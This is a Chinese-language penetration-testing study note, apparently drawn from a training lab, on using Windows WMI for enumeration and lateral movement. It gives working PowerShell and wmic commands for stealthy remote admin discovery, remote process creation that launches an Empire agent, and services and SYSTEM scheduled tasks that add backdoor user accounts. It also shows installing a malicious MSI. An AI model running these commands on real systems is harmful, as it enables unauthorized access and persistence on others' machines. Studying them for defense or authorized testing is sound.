:::info
- 端口:
- 135/TCP, 49152-65535/TCP (DCERPC)
- 5985/TCP 5986/TCP (WinRM)
- 权限: 管理员
:::
介绍
WMI 是微软提供的一种管理和监控 WIndows 操作系统及其组件的框架, 可以通过 API 或命令行工具与操作系统交互,.
WMI提供了一种标准化的、面向对象的编程接口,允许开发人员使用各种编程语言(如C++, C#, VBScript等)来查询和修改系统配置、运行状态、事件日志等信息,并支持远程管理和监控。用户可以使用WMI来获取硬件和软件信息、执行系统管理任务等。
WMI主要由 WMI核心、WMI提供程序和 WMI服务 三个部分组成。其中,WMI提供程序为不同的Windows组件和应用程序提供了标准化的WMI接口,而WMI核心则负责解析WMI提供程序所提供的数据和方法。WMI服务则是WMI的运行时环境,负责处理WMI的请求和维护WMI的状态。
WMI 允许我们在知道用户名/(密码/哈希) 情况下,打开主机中的进程, 然后,Wmiexec使用wmi来执行每个被要求执行的命令(这就是为什么Wmicexec给你半交互式的shell)。
dcomexec.py: 这个脚本提供了一个类似于wmiexec.py的半交互式shell,但使用不同的DCOM端点(ShellBrowserWindow DCOM对象)。目前,它支持MMC20。应用程序、Shell Windows和Shell Browser Window对象。(来自Impacket Guide: SMB/MSRPC - Hacking Articles)
基础内容
命名空间
WMI被划分为一个目录式的层次结构,即\root容器,在\root下还有其他目录。这些 “目录路径 “被称为命名空间。
列出命名空间:
#Get Root namespacesgwmi -namespace "root" -Class "__Namespace" | Select Name#List all namespaces (you may need administrator to list all of them)Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace#List namespaces inside "root\cimv2"Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace
列出一个命名空间的类:
gwmwi -List -Recurse #If no namespace is specified, by default is used: "root\cimv2"gwmi -Namespace "root/microsoft" -List -Recurse
类
WMI类的名称,例如:win32_process是任何WMI行动的起点。我们总是需要知道一个类名和它所在的命名空间。
列出以win32开头的类:
Get-WmiObject -Recurse -List -class win32* | more #If no namespace is specified, by default is used: "root\cimv2"gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"
查看指定类
#When you don't specify a namespaces by default is "root/cimv2"Get-WmiObject -Class win32_shareGet-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus
方法
WMI 类具有一个或多个可以执行的函数。这些函数称为方法
#Load a class using [wmiclass], leist methods and call one$c = [wmiclass]"win32_share"$c.methods#Find information about the class in https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-share$c.Create("c:\share\path","name",0,$null,"My Description")#If returned value is "0", then it was successfully executed
#List methodsGet-WmiObject -Query 'Select * From Meta_Class WHERE __Class LIKE "win32%"' | Where-Object { $_.PSBase.Methods } | Select-Object Name, Methods#Call create method from win32_share classInvoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)
WMI 枚举
检查 WMI 服务
查看 WMI 正在运行的方法
#Check if WMI service is runningPS C:\> Get-Service WinmgmtStatus Name DisplayName------ ---- -----------Running Winmgmt Windows Management Instrumentation#From CMDC:\> net start | findstr "Instrumentation"
系统信息
Get-WmiObject -ClassName win32_operatingsystem | select * | more
处理信息
Get-WmiObject win32_process | Select Name, Processid
从攻击者的角度来看,WMI 在枚举有关系统或域的敏感信息方面非常有价值。
wmic computerystem list full /format:listwmic process list /format:listwmic ntdomain list /format:listwmic useraccount list /format:listwmic group list /format:listwmic sysaccount list /format:list
Get-WmiObject Win32_Processor -ComputerName 10.0.0.182 -Credential $cred
远程查询
这是一种非常隐蔽的方式来发现远程机器上的本地管理员(注意域是计算机名):
wmic /node:ordws01 path win32_groupuser where (groupcomponent="win32_group.name=\"administrators\",domain=\"ORDWS01\"")
查看谁登陆了机器:
wmic /node:ordws01 path win32_loggedonuser get antecedent
wmic甚至可以从文本文件中读取节点并对所有节点执行命令。如果您有工作站的文本文件:
wmic /node:@workstations.txt path win32_loggedonuser get antecedent
我们将通过 WMI 远程创建一个进程来执行 Empire 代理:
wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "**empire launcher string here**"
我们看到它执行成功(ReturnValue = 0)。一秒钟后,我们的 Empire 听众听到了。请注意,进程 ID 与返回的 WMI 相同。
连接
$username = 'Administrator';$password = 'Mypass123';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;$Opt = New-CimSessionOption -Protocol DCOM$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
我们可以使用以下任意一种进行建立会话:
- DOCM : RPC over IP将被用于连接WMI。该协议使用端口135/TCP和端口49152-65535/TCP,就像使用sc.exe时解释的那样。
- Wsman : 使用 WinRM 进行连接,我们可以使用端口 5985 5986
远程进程
我们可以利用 WMI 从 Powershell 远程生成进程:
$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere";Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $Command}
WMI 不允许查看命令输出,但是会以静默方式创建所需进程
我们也可以使用 wmic 完成相同操作
wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe"
远程服务
创建一个 THMService2 服务:
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{Name = "THMService2";DisplayName = "THMService2";PathName = "net user munra2 Pass123 /add"; # Your payloadServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new processStartMode = "Manual"}
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'"Invoke-CimMethod -InputObject $Service -MethodName StartService # 启动Invoke-CimMethod -InputObject $Service -MethodName StopService # 停止Invoke-CimMethod -InputObject $Service -MethodName Delete # 删除
计划任务
# Payload must be split in Command and Args$Command = "cmd.exe"$Args = "/c net user munra22 aSdf1234 /add"$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $ArgsRegister-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2"
Start-ScheduledTask -CimSession $Session -TaskName "THMtask2" # 启动计划任务Unregister-ScheduledTask -CimSession $Session -TaskName "THMtask2" # 删除计划任务
MSI 包
我们可以使用上传的恶意 MSI 程序进行
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}
我们也可以使用 wmic.exe 实现
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi
参考
若有收获,就点个赞吧
0 人点赞
